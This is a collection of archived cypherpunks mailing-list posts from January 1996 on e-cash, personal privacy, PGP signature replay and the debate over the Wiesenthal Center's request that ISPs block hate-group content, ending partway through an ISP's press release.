Date: Tue, 9 Jan 96 23:16:54 PST
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Book on Electronic Commerce
In-Reply-To: <01HZTEQR5AE8A0UD8R@mbcl.rutgers.edu>
Message-ID: <Pine.BSD.3.91.960109205433.7811H-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Allen, 
 
 
  Here's another one, fresh out: 
 
 
      Daniel Lynch and Leslie Lundquist. 
 
      Digital Money. The New Era of Internet Commerce. 
 
      1996.  304 pages.  $24.95. 
 
      John Wiley & Sons, Inc. 
 
      1 800 22 559 4539. 
 
      ISBN 0 471 14178 X. 
 
 
 
  From the blurb: 
 
      It explains the technical underpinnings of transactions, 
      including encryption and digital signatures, and details 
      the resources and procedures involved in establishing an 
      exchange-capable service. 
 
 
  Cordially, 
 
  Jim 
 
 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alexander 'Sasha' Chislenko" <sasha1@netcom.com>
Date: Tue, 9 Jan 96 19:24:17 PST
To: cypherpunks@toad.com
Subject: PRIVACY: Private traces in public places
Message-ID: <2.2.32.19960110032650.006f1934@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  Most of the materials that are currently available on the Net and
can be easily found through many search engines were created
for other media, by people who were not aware that these materials
may ever end up on the Web.
  Sometimes, it comes as an unpleasant surprise to a person who
looks for web pages referencing his own name, and finds, among
other things, many of his explicit or controversial usenet or mailing
list messages, old resumes that may contradict the current one,
critical remarks of his high school girlfriend and former colleagues, etc.
Knowing that this information is easily accessible to his new girlfriend
and prospective employer may make him more than uncomfortable.

All advice to such a person you may see on the Net mentions Net laws
that should have been passed and personal actions that should or
should not have been taken.

In both cases, it's usually too late.

Fortunately, not that many people have been burned.
We can bury them (or their reputations) and move ahead, vowing not
to repeat their mistakes.  From now on we, the prudent ones, will be
very careful not to leave compromising traces where they can be
uncovered by existing technologies and made public.

It's called "learning from other people's mistakes".

- No, it isn't !

The mistake those people made was not leaving traces that could be made
public with *then* existing technologies.  It was doing things that could be
uncovered by technologies (like search engines) that at the time *did not
exist*.

If you want to learn from these mistakes, you should look at what information
about yourself you are leaving behind that can be made public tomorrow.

Let's look at what traces you leave.  

 I do not want to consider time travelers from the future watching your life.
- Just some already available technologies that are on the rise and will be
cheap and ubiquitous tomorrow.


- Your database records.
- All letters to public officials that you ever wrote or that mentioned your
name.
- All mentions of you in any printed press.
- All published photos where you can be recognized (including street crowds,
  demonstrations, football games) - they will all be scanned some day, and
  machines with image recognition will find you even where you wound't.

- Your fingerprints.  How many books, magazines and other things currently
  stored all over the world carry your fingerprints?  It is possible to
figure out
  what pages you read, after whom, with whom, etc.

- Landfills:  They are probably the richest source of detailed historical
information
   that is not obtainable from any other source and can be used to reconstruct
   the detailed history of society, economy, technology and any single
person with
   incredible detail.

  Besides thousands of your personal letters and documents, they contain data on
  the evolution of your intelligence,  handwriting, habits such as
nail-biting, samples
  of hair that you washed with different shampoos (or didn't) and millions
of discarded
  little things identifiable by your writing, fingerprints or DNA samples.
One may figure
  out where you drank a cup of Coke 30 years ago,  and who you shared it with.

  And so on.

  The technology necessary to recover and index all this data is already
available
and will become very cheap in a few decades.

How can people protect themselves from all this?

Will people of the future all wear identical privacy suits, gloves and
helmets and burn
everything they have touched?

Or they will just try not to do things they may later be ashamed of?
(How do you know what you may be ashamed of 30 years from now?)

----------------------------------------------------------
Alexander 'Sasha' Chislenko <sasha1@netcom.com>
Home page:  http://www.lucifer.com/~sasha/home.html
Great Thinkers page:  http://www.lucifer.com/~sasha/thinkers.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 10 Jan 96 04:19:41 PST
To: blancw@accessone.com
Subject: RE: S.652 (H.R. 1555) (\"obscene, lewd, lascivious, filthy, or indecent...et al\")
Message-ID: <199601101219.HAA28940@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by blancw@accessone.com (blanc) on Tue, 9 Jan 
 8:41 PM


>What needs to do is to learn to speak like politicians. 
> Learn to go around the subject, make indirect 
>reference, make vague allusions, be indirect & 
>wavering, ambiguous & obfuscating, evasive & 
>hypocritical; never openly offending, never possible 
>to be held liable for having said anything of 
>consequence.
>
>Of course it will still be annoying, but how can they 
>criticize their own style & manner.



Ah, you've godiva'd le roy, and guttered moi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 10 Jan 96 09:20:27 PST
To: Tim Philp <bplib@wat.hookup.net>
Subject: Re: E-cash and Interest
Message-ID: <m0ta43a-00090DC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:20 AM 1/10/96 -0500, you wrote:
>
>I think that you have hit the nail on the head. Money could still 'earn' 
>interest until it is spent. The 'bank' still has the 'real' money. In 
>fact, it is an improvement over cash, in that you could still earn 
>interest on the money on your hard drive.
>Thanks for the clarification.

I think there is another way of looking at the ecash/interest situation:
From upside down, so to speak.  If the USE of Ecash avoids (legally or
illegally) income or sales taxes, that constitutes an "interest," in an odd
sort of way.  Not "real" interest, of course, but the next best thing.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Dahlgren <kent@trouble.WV.TEK.COM>
Date: Wed, 10 Jan 96 09:13:34 PST
To: Duncan Frissell <frissell@panix.COM>
Subject: Re: When they came for the Jews...
In-Reply-To: <2.2.32.19960110153325.006b5980@panix.com>
Message-ID: <Pine.SUN.3.91.960110084425.2133A-100000@trouble>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 10 Jan 1996, Duncan Frissell wrote:

> "I favor discrimination on the basis of race, creed, color sex, age,
> alienage, previous condition of servitude, recent interstate travel,
> handicap, sexual or affectional preference, marital status, Vietnam-era
> veteran status (or lack thereof), occupation, economic status, and anything
> else I can think of."
> 
I really wish I had the original newspaper clipping so I correctly quote 
the column, but it went something like this:
Here in Portland, Oregon, we used to have quite a problem with Nazi 
skinheads.  Not that they are not around now, but then they were 
everywhere.  Being that most of the city is white trash, you'd think it 
wouldn't have caused much of a ruckus if they were simply beating up 
minorities.  But its been my personal experience that they would prefer 
beating up "fellow" whites instead.  That, coupled with the murder of 
Saraw, seemed to stir things up against the skinheads.  Anyhow, that's my 
background to it.  The column didn't talk about that.  It was this guy 
writing about the Banai Brith (spelling?) in Los Angeles getting 
critisism about gathering and keeping records on suspected skinheads.  
Turns out they got alot of that stuff from Portland's own Multnomah 
County Sheriff, who releases thier police reports as public information.  
So this reporter decided to get some of these reports, and some of the 
records that the banai brith were keeping, and printed some.  Like I was 
saying, public opinion at the time was way against the skinheads, and I 
was more than a little irritated at the time at them because of the 
roving bands of punks that made life in MY city uncomfortable.  So I read 
through each police report, really eating it up.  "White male, (his name,) 
apprehended for distributing nazi literature."  "White female, (her 
name,) questioned.  Wearing a jacket with a swastika."  Stuff like that.  
Then the reporter lowered the boom.  He asked us in the reading audience 
to substitute "skinhead" and "nazi" with "hippy" or "communist," and see 
how we felt about that.  This was a very unpopular position at the time, 
in a city hell bent on getting rid of these skinheads, but he made a good 
point with me.  

Maybe someone could tell me how I could get a hold of the original.  The 
paper is the Oregonian.  I could probably figure out the reporter's 
name...if I only had a brain.  I'd love to post it.

Again, flames are always welcomed, as I am home sick and could use the abuse.

______________________________________________________________________________
______ T E K T R O N I X _ C P I D _ T E C H N I C A L _ S U P P O R T _______
                      /
 Voice: 1.800.835.6100             E-mail: support@colorprinters.tek.com
    Fax: 1.503.685.3063                WWW: www.tek.com
     BBS: 1.503.685.4504            E-World: Keyword Tektronix
      HAL: 1.503.682.7450                AOL: Keyword Tektronix
   Service: 1.800.835.6100                FTP: ftp.tek.com
______________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mandl <dmandl@bear.com>
Date: Wed, 10 Jan 96 06:40:07 PST
To: John Young <jya@pipeline.com>
Subject: Re: TAL_kup
In-Reply-To: <199601101426.JAA16123@pipe3.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.960110093622.4338N-100000@goya>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 10 Jan 1996, John Young wrote:

>    "Group Urges an Internet Ban On Hate Groups' Messages.
>    Joins in Move to Censor Offensive Material."
> 
>       Citing the "rapidly expanding presence of organized hate
>       groups on the Internet," a leading Jewish human rights
>       group yesterday began sending letters to hundreds of
>       Internet access providers and universities asking them
>       to refuse to carry messages that "promote racism, anti-
>       Semitism, mayhem and violence."
                  ^^^^^^

Damn it, _now_ they've gone too far.

--
David Mandl
Bear, Stearns & Co. Inc.
Phone: (212) 272-3888
Email: dmandl@bear.com

--
*******************************************************************************
Bear Stearns is not responsible for any recommendation, solicitation, offer or
agreement or any information about any transaction, customer account or account
activity contained in this communication.
*******************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Philippe VIJGHEN <phv@bim.be>
Date: Wed, 10 Jan 96 15:04:45 PST
Subject: Re: A weakness in PGP signatures, and a suggested solution (long)
In-Reply-To: <199601030407.UAA12551@comsec.com>
Message-ID: <30F37F39.480@bim.be>
MIME-Version: 1.0
Content-Type: text/plain


You are right but the question is: what do you want to sign/encipher,
the message body or the whole message exchange?

We thinked about this when we developed a piece of software
for the European Space Agency which is called EDIDOC server 
(Electronic Data Interchange of Documents).

In our case, SMTP header signing was anyway not acceptable
because we needed to support various communication means.

I won't go into too much details but EDIDOC is acting as 
a central server for information exchange with value added as:
- a clearing house
- security gateway
- communication gateway
- a gateway at document format level
- groupware aspects

Roughly,
- a clearing house:
	everything exchange is logged in the server db

- security gateway
	...this requires of course trusting of the server
	but people with different security packages can send/receive
	 "secured message" (signature, enciphering) to/from
	the server without worrying of the recipient/originator
	configuration. Only the server public key need to be known
	by the partners.

- communication gateway:
	Various ways of transmitting the messages to/from the server
	depending of partner configuration.

	This means that although, as you pointed out, the envelope 
	must be secured itself it can not be the envelope
	specific to the communication method used (SMTP, X.400,...)
	-> usefull information can not be stored at the level
	   of the communication method header (ex. SMTP) but is 
	   included in the secured body (originator, destinator, 
	   timestamp, subject, ....)
	   Only the strict minimal information is included in the
	   SMTP, X.400, FTP, floppy, a.s.o. "headers".
	   Our envelope is structured according to a SGML DTD.

- a gateway at document format level
	Server is doing conformance checking of	documents and
	can even down-translate them based on the recipient
	settings (some will expect SGML, other ones EDIFACT, other
	ones ASCII, other partners WP, .... depending of the
	type of document)

- groupware aspects
	complex scenarios (as chain of approval, document review, ...)
	may be implemented at the server level


For more information, send an e-mail to edidoc-info@bim.be

ESA/ESRIN has some information at http://www.esrin.esa.it

BIM Engineering as a home page (http://www.bim.be) which should
"soon" include information about the server


Philippe VIJGHEN
BIM Engineering Europe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pamphlet@idiom.com (Anonymous Pamphlet Distributor - wcs@idiom.com)
Date: Wed, 10 Jan 96 11:09:10 PST
To: cypherpunks@toad.com
Subject: nazi's, jews, and why you don't get to hear about them
Message-ID: <199601101909.LAA23040@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain


Internet providers asked to censor racist groups
----------------------------------------------------------------------------

Copyright 1996 Nando.net
Copyright 1996 The Associated Press

BOSTON (Jan 10, 1996 09:34 a.m. EST) -- White supremacist groups that once
spread their racist messages at rallies and in leaflets are now going
high-tech on the Internet -- a trend a leading Jewish human rights group
wants to stop.

The Simon Wiesenthal Center on Tuesday began sending hundreds of letters to
Internet access providers asking them to refuse to carry messages that
"promote racism, anti-Semitism, mayhem and violence."

Good idea? No, say providers and civil libertarians. They argue that public
debate is the way to defeat hate.

The Internet allows users to "show the whole world what's wrong wrong about
what the hate speakers are saying," said Mike Godwin, staff counsel for the
Electronic Frontier Foundation, a civil liberties group dealing with
computer communications.

"The correct place to try and put pressure is on the people who create the
content, not the person who provides access to it," said CompuServe
spokesman William Giles.

The roughly 250 hate groups in the United States, whose previous methods
reached a limited audience, now "have a magnificent marketing technology
dumped in their laps," said Rabbi Abraham Cooper, associate dean of the
Wiesenthal center, based in Los Angeles. "They are able to dress up their
message in a way that looks ... presentable."

Slick web sites are springing up every day, with names such as Aryan
Nations, Skinheads U.S.A. and The Aryan Crusader's Library.

Ernst Zundel, a prominent Canadian Holocaust revisionist who has a homepage
called Zundelsite, says he should have as much of a right to post a web page
as anyone else.

"The Internet is the first and last truly free marketplace of ideas, for the
time being. It levels the playing field," Zundel said. "To curtail the
freedom for some will curtail the freedom for all."

The Wiesenthal Center's request is part of a growing debate over whether
Internet service providers should be viewed as publishers responsible for
what moves on their networks, or carriers who simply provide access to a
service without monitoring what is communicated.

The Wiesenthal Center argues that the services are publishers who have a
civic responsibility not to promote bigotry.

Godwin says Internet service providers should be treated like bookstores,
which exercise some control when they decide to specialize in science
fiction instead of mysteries, but are not expected to read every book and be
held responsible for the books' contents.

Prodigy spokesman Brian Ek said the service does employ systems operators
who monitor content on its proprietary bulletin boards and can remove any
messages with "blatant expressions of bigotry, racism or hate."

But what exactly meets that definition is hard to pin down: "You make a
decision when you see it."

For example, when one subscriber pointed out a "repugnant" bulletin board
message saying the Nazi extermination of 6 million Jews was a good thing,
Prodigy removed it

Joe Bunkley -- who operates the "1st WWW Banned Media Page," a web site that
links to virtually every other white supremacist and neo-Nazi Internet site
-- had a strong message for those who would want to stop him from posting
his views.

"You cowards who want my page shut down can't deal with either the diversity
or the free interaction of ideas," he said.

"You, the intellectually dead, are hereby formally notified that my
intentions are not to offend anyone. It is to speak the truth as I know it
and to ensure, to the best of my abilities, the survival of the White Race."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 10 Jan 96 11:33:20 PST
To: adam@lighthouse.homeport.org (Adam Shostack)
Subject: Re: When they came for the Jews...
In-Reply-To: <199601101826.NAA04543@homeport.org>
Message-ID: <199601101927.LAA14427@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 	The Wiesenthal center is very influential in Jewish circles.

	That's very unfortunate, considering how fascist they are.

> Attacking them directly would probably be a bad idea, and create bad
> associations for anonymity amongst Jews.  (I'll come back to this.)

	You make very good points though. I'll have to stress the
benefits of not preventing hate speech rather than just saying that
it's impossible to prevent.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@utopia.hacktic.nl>
Date: Wed, 10 Jan 96 03:53:19 PST
To: cypherpunks@toad.com
Subject: Re: SSH for Windows
Message-ID: <199601101153.MAA20011@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


: ...can be found at URL http://public.srce.hr/~cigaly/ssh/.  FYI.

also on ftp.hacktic.nl/pub/replay/pub/incoming/ssh-1-2.zip

(the .hr link is _very_ slow)
 -AJ-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 10 Jan 96 13:01:40 PST
To: Ted Garrett <teddygee@visi.net>
Subject: Re: Is this true...
In-Reply-To: <2.2.32.19960110202813.006bb954@visi.net>
Message-ID: <Pine.ULT.3.91.960110125059.13238J-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 10 Jan 1996, Ted Garrett wrote:

> Being new to crypto subjects, I guess I'm pretty gullable about how much one
> should use encryption in general.  I remember reading somewhere that it
> would probably be best for the 'world as a whole' if everyone used
> encryption whenever possible so that when you DO send encrypted messages
> that actually contain information you want kept secret, it doesn't stick out
> like a sore thumb.
> 
> To that end, I should imagine that once I have a person's pgp key, they may
> well never see another cleartext message from me again!

The liability of that is a little inconvenience, which can lead to
laziness and insecurity. 

I usually read mail on a highly visible multiuser UNIX system of which I
am not the sysadmin and that has been broken into several times. If you
send me encrypted mail, then I either need to keep my key, type my
passphrase, etc. on this insecure system, or download the mail to a PC or
Mac, which isn't always possible. 

Most sessions of mine to this host are encrypted in kerberos or ssh, but 
not all.

Sending unencrypted mail is rather like sending a postcard. But postcards 
are fine a lot of the time. 

Being too cavalier about the use of PGP is rather like putting multiple
deadbolts on the front door to your house, but accidentally dropping 
copies of your house keys wherever you go.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
Date: Wed, 10 Jan 96 11:09:30 PST
To: adam@lighthouse.homeport.org (Adam Shostack)
Subject: Re: When they came for the Jews...
In-Reply-To: <199601101826.NAA04543@homeport.org>
Message-ID: <30f40ea06f6c002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


sameer wrote:
| 
| 
| 	Is there some way I can get a copy of this letter? Is it
| directed at specific ISPs or ISPs in general? An open response,
| publicized, to this sounds like something I could do. Publicity is
| fun.

| > Citing ``the rapidly expanding presence of organized hate groups on the
| > Internet,'' a leading Jewish human rights group [the Simon Wiesenthal
| > Center] on Tuesday began sending letters to hundreds of Internet access
| > providers and universities asking them to refuse to carry messages that
| > ``promote racism, anti-Semitism, mayhem and violence.'' 

As of the current time, we haven't received this letter (via 
postmaster@umn.edu or root@umn.edu). Anyone know where it might
be coming from, i.e. @wiesenthal.com or something similar?


-- 
Kevin L. Prigge         |"Have you ever gotten tired of hearing those 
UofM Central Computing  | ridiculous AT&T commercials claiming credit 
email: klp@tc.umn.edu   | for things that don't even exist yet? 
010010011101011001100010| You will." -Emmanuel Goldstein 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 10 Jan 96 04:43:45 PST
To: cypherpunks@toad.com
Subject: Re: PRIVACY: Private traces in public places
Message-ID: <199601101243.NAA21309@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by tcmay@got.net (Timothy C. May) on Wed, 10 
Jan  0:9  AM


>I'm not trivializing the issue of search engines and 
>archiving systems  turning up articles written, old 
>posts, etc. Every couple of weeks,  sometimes more 
>often, someone sends me a copy of one of my postings 
>and  claims that someone else must be forging my name 
>(recent posts on racial  issues, for example--while I'm 
>not a racist, I despise quotas, setasides,  and 
>preferential treatment for lazy people, of any 
>race...this obviously  makes some people "ashamed for 
>me" :-}).



http://nytsyn.com/live/News3/006_010696_101827_2723.html 

  
   Last summer the first case in Britain of a libel on the 
Internet was
   settled out of court when Laurence Godfrey accepted 
undisclosed
   damages from another nuclear physicist, Philip Hallam-Baker, 
over
   remarks made in 1993 on Usenet, an electronic conference 
with 16
   million users. And Peter Lilley, the Social Security 
Secretary, sent a
   stiff letter to the vice-chancellor of Leeds University 
after one of
   its students used a faculty computer to make defamatory 
allegations
   about him.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@grendel.texas.net>
Date: Wed, 10 Jan 96 11:49:54 PST
To: cypherpunks@toad.com
Subject: Re: When they came for the Jews...
In-Reply-To: <199601101826.NAA04543@homeport.org>
Message-ID: <55d98r96f2.fsf@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3937.1071713541.multipart/signed"

--Boundary..3937.1071713541.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Adam Shostack <adam@lighthouse.homeport.org> said:

AS> The Wiesenthal center is very influential in Jewish circles.
AS> Attacking them directly would probably be a bad idea, and create bad
AS> associations for anonymity amongst Jews.  (I'll come back to this.)

AS> As always, the best answer to bad speech is more speech.  Ken McVay,
AS> and his Nizkor project, (http://nizkor.almanac.bc.ca) have been
AS> involved in fighting hate speech, holocaust revisionism, and the
AS> like for long time through archiving the big lies that revisionists
AS> pump out, documenting the bogosity of their footnotes, showing their
AS> contradictions, etc.  Pointing out this, and other net resources
AS> fighting anti-semitism is a much cleaner approach than attacking the
AS> Wiesenthal center.

	Isn't this attacking, or at least opposing, them directly?

AS> Someone noted the police stopping skinheads in Oregon-- I'll point
AS> out that there is a substantial difference between talking and
AS> randomly beating the crap out of people.  The later is a fair basis
AS> for action by police, although we may choose to question their
AS> methodology.  There is also a difference between stopping skinheads
AS> and stopping blacks, in that the skinheads decided to wear clothing
AS> and tattoos that identify them as skinheads, and thus may more
AS> fairly be asked to bear the consequences.

	This is known as the "[S]he asked for it" argument, a widely
discredited defense.  If their _behavior_ doesn't indicate criminal
behavior, and there isn't a report of a crime with suspects meeting
their descriptions, there is no more excuse for hassling them than there
is for hassling blacks, or hispanics, or....  Who knows, they could
actually be a bunch of Marines (depending on the area).

AS> Another approach might be to talk about the concept of identity, and
AS> how dangerous mandating identity cards and papers can be.  Jews in
AS> Germany were tracked down via phone records, bank records,
AS> membership lists of organizations (a lesson probably noted by the
AS> NAACP in refusing to give Alabama its membership rolls, leading to a
AS> supreme court case upholding the right of anonymous association.)

	And more recently used in Texas by the KKK, represented by a
black (given the organization defended, I think that the race of the
attorney is relevant) attorney from the ACLU.  The attorney was
subsequently removed as the counsel for the Texas chapter of the NAACP.

-- 
#include <disclaimer.h>				/* Sten Drescher */
1973 Steelers    About Three Bricks Shy of a Load    1994 Steelers
1974 Steelers         And the Load Filled Up         1995 Steelers?
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3
Unsolicited email advertisements will be proofread for a US$100 fee.


--Boundary..3937.1071713541.multipart/signed
Content-Type: application/octet-stream; name="pgp00005.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00005.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IDIuNi4yCgpp
UUNWQXdVQk1QUVlTVnZCZ1JjZGtHd0ZBUUZLQ3dRQWtmNzZQM0hobEVEMWw3
NjhOV1dXQldSVmQ4VWlOaW52CndWVEdXWkZRLzVJTVl3ekR3NVJ1U2xlcTQ0
czBMQmcvV1h1dlAyZjVydy9KaHpQcEdqcyt5T2pMcHlxaWF2YzcKNXlnTTNl
SldrbkZ5UVJKU1h2Y0tYcWRSV2prNzZycEFHT0dYWkJ6YW5XODhRRHJnWldz
bmdJVURiZk5kb1ZsWAp1QmRUUHVqSWJzST0KPU1YaFUKLS0tLS1FTkQgUEdQ
IE1FU1NBR0UtLS0tLQo=
--Boundary..3937.1071713541.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 10 Jan 96 14:43:16 PST
To: Ted Garrett <teddygee@visi.net>
Subject: Re: Is this true...
Message-ID: <m0ta9BY-0008xTC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:28 PM 1/10/96 -0500, you wrote:

>To that end, I should imagine that once I have a person's pgp key, they may
>well never see another cleartext message from me again!  Of course, now I'm
>trying to figure out how to use the anonymous remailers and such.  Boy, this
>is fun!
>
>Of course, the fact that my government doesn't really care for the idea of
>publicly available cryptography makes it even more enticing.
>Ted Garrett
>Live Systems Integration

And that's the REALLY ironic part!  PGP (as wonderful as it is, politically,
that Zimmermann wrote it...) is
 so frigging frustrating and difficult to use (as programs go, anyway), and
interface to, and I haven't 
even TRIED to use anonymous emailers yet  (sheer laziness on my part, I
admit).  If the government came 
out neutral about them, or "God forbid" REQUIRED us to learn how to use
them, I'd probably be proudly 
resisting their desires and ignoring the whole technology.

Makes you stop and think, doesn't it?!?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 10 Jan 96 15:01:54 PST
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Net Control is Thought Control
In-Reply-To: <2.2.32.19960110175223.006a6bcc@panix.com>
Message-ID: <199601102251.OAA09843@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



DCF makes some excellent points about the difficulty of *overt*
thought control in a information society.

however I would like to suggest that in our own democratic culture, *overt*
thought control is not really that important and is not necessarily
the major means of thought control.

the most insidious, and effective, form of thought control is that
which manipulates subject's thinking without their being aware of it.

there are a variety of ways to accomplish this, many of them outlined
in a book called "Coercive Persuasion" loaned to me be an acquaintance.

one way is to try to infiltrate groups with particular individuals who
are loyal to the "thought control" agenda, who then attempt to gain
the trust of members, but then also try to subtly manipulate their thinking.

the problem that "covert thought control" becomes more possible with
an information age that does not handle identity in any "permanent" or
"enduring" way. agent provocateurs etc. may be more difficult to identify
and easier to create and maintain.   in fact a single "government
thought control agent" might be able to create and maintain dozens of
convincing identities, all of them working to subtly manipulate the
population's thinking without detection. in the real world, once a "person"
is discredited, all that they do is tainted, but when a "tentacle" is
"tainted" in cyberspace, the "operator" need only create a new "tentacle"--
an operation that is becoming increasingly cheap.

so in other words I would say that cyberspace raises some problems while
solving others, and that its full implications are not yet apparent. I suspect
we are simply going to run into new, more sophisticated forms of thought 
control, not the total dissolution of its capability, in cyberspace. old
forms of trying to kill thoughts based on the physical medium, such as bashing
printing presses, will dissolve, but other forms of "meme damage" such
as "flooding attacks" etc. may arise instead.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeffrey Goldberg <cc047@Cranfield.ac.uk>
Date: Thu, 11 Jan 96 09:18:32 PST
To: dlv@bwalk.dm.com
Subject: Re: A weakness in PGP signatures, and a suggested solution (long)
In-Reply-To: <199601030407.UAA12551@comsec.com>
Message-ID: <Pine.ULT.3.91.960110182255.18692H-100000@xdm011>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[I am posting this to exactly the same groups that the original was posted
 to.  If someone feels that the distribution should be more limited please
 restrict the follow-ups.  I have also mailed a copy to the original 
 poster.]

On Wed, 27 Dec 1995, Dr. Dimitri Vulis wrote:

> Bob once sent Carol an e-mail that looked like this:
> 
> -----------------------------------------------------------------------
> From: Bob@boxb
> To: Carol@boxc
> Date: 25 Dec 1965
> Subject: Carol, we're history
> Message-ID: <111@boxb>
> 
> ----BEGIN PGP SIGNED MESSAGE----
> 
> I no longer wish to go out with you. Merry Christmas!
> 
> ----BEGIN PGP SIGNATURE----
> Version 2.6.2
> 
> 12341234...
> 
> ----END PGP SIGNATURE----
> 
> -----------------------------------------------------------------------
> 
> Carol can forge an e-mail to Alice that looks like this:
> 
> -----------------------------------------------------------------------
> From: Bob@boxb
> To: Alice@boxa
> Date: 25 Dec 1995
> Subject: Alice, we're history
> Message-ID: <222@bobb>
> 
> ----BEGIN PGP SIGNED MESSAGE----
> 
> I no longer wish to go out with you. Merry Christmas!
> 
> ----BEGIN PGP SIGNATURE----
> Version 2.6.2
> 
> 12341234...
> 
> ----END PGP SIGNATURE----

I have omitted the other scenarios for reasons of space.  All of
them are based on the fact that information about the intended
recipient (including newsgroup) is not part of the information signed.

I proposal is made for a mechanism to have some header information
signed as well.

I don't think that such a thing needs to be build into pgp, but might
be included in pgp/MUA interfaces.

I also think that the crucial lesson here is to take the analogy to
signature on paper more seriously.  Imagine that paper documents were
reproducible in a way that made the original indistinguishable from
copies.  Under search circumstances you would never sign something like:

   I agree to give you my house plus $30,000 in exchange for your house.
                                            (signature)

For the same reasons that you would never sign something like that (without
specifying the individuals and the properties in question), you shouldn't
sign an electronic when the interpretation of the document is a function
of whose hands its in.  As with the paper document, you would never
rely on its interpretation depending on the name on the envelope, you
shouldn't rely on the headers.

As for the recipient, the signature determines responsibility for the
signed portion, but not for the act of sending the document.

The only difference between paper and E-docs is that with paper there
is a distinction between the original and copies.

The lesson is not so much that we should change pgp, but that we should
pay very careful attention to what we sign. 

- -jeff

Jeffrey Goldberg                +44 (0)1234 750 111 x 2826
 Cranfield Computer Centre      FAX         751 814
 J.Goldberg@Cranfield.ac.uk     http://WWW.Cranfield.ac.uk/public/cc/cc047/
      "An `alternative paradigm' is the first refuge of the incompetent" --LM


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Processed by mkpgp, a Pine/PGP interface.

iQCVAgUBMPQNUBu6nIqxqP+5AQGHxgQAunhff6dV0eCXuVe6w+t0KWELlfjx3Iu4
SrKKo/DB+yWYDn+UVsFPyqvG64qmBxSaLLT95S3rbJEPklpRteN2+8Z94O5PxvL4
Q0OfGSX7oPN2Hwl3hkbjhwLWMpogcxfg6yle1SsqMCTMj3t8RAdmWD8DAQ9fEVzK
JdSdEXoc37s=
=21Kt
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 10 Jan 96 16:17:19 PST
To: cypherpunks@toad.com
Subject: David Kahn on C-Span 2
Message-ID: <199601110017.TAA06836@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


David Kahn, NSA Scholar-in-Residence, is speaking on C-Span 2 
now, 7:20 PM Est, reviewing "Secret Codes in WW2."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 11 Jan 96 01:43:54 PST
To: cypherpunks@toad.com
Subject: COMMUNITY CONNEXION REFUSES TO CENSOR INTERNET SERVICES
Message-ID: <199601110938.BAA10567@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


For Immediate Release - January 11, 1996
Contact: Sameer Parekh 510-601-9777x3

       COMMUNITY CONNEXION REFUSES TO CENSOR INTERNET SERVICES

Berkeley, CA - In an open letter sent today to the Simon Wiesenthal
Center, Community ConneXion, the Internet Privacy Provider, explicitly
stated its refusal to agree to their request to restrict access to
